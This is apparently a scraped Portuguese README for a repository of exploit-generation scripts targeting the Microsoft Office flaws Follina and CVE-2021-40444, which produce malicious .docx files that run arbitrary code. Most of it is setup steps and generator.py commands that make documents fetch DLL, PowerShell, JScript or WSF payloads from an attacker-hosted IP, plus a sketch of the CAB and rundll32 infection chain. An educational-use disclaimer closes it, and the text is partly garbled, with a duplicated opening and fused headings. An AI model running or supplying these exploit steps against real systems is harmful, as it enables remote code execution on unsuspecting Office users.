
Este repositório contém scripts e recursos para explorar as vulnerabilidades Follina CVE e CVE-2021-40444 no Microsoft Office. Os scripts geram arquivos de documento maliciosos que podem executar código arbitrário no sistema alvo.
Este repositório contém scripts e recursos para explorar as vulnerabilidades Follina CVE e CVE-2021-40444 no Microsoft Office. Os scripts geram arquivos de documento maliciosos que podem executar código arbitrário no sistema de destino.
requirements.txt)Configuração do Flare VM:
labpasswordPython e Ambiente Virtual:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv usando o seguinte comando:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Gerando o Exploit:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
Substitua 192.168.197.132 pelo seu endereço IP.Acessando o Documento Gerado:
.docx gerado estará localizado no diretório:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) é aberto.document.xml.rels.%TEMP%Low.rundll32 carregue lateralmente o arquivo INF.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Este projeto é apenas para fins educacionais. Use-o com responsabilidade e não explore vulnerabilidades em sistemas nos quais você não tem permissão para testar. O uso indevido dessas informações pode levar a acusações criminais.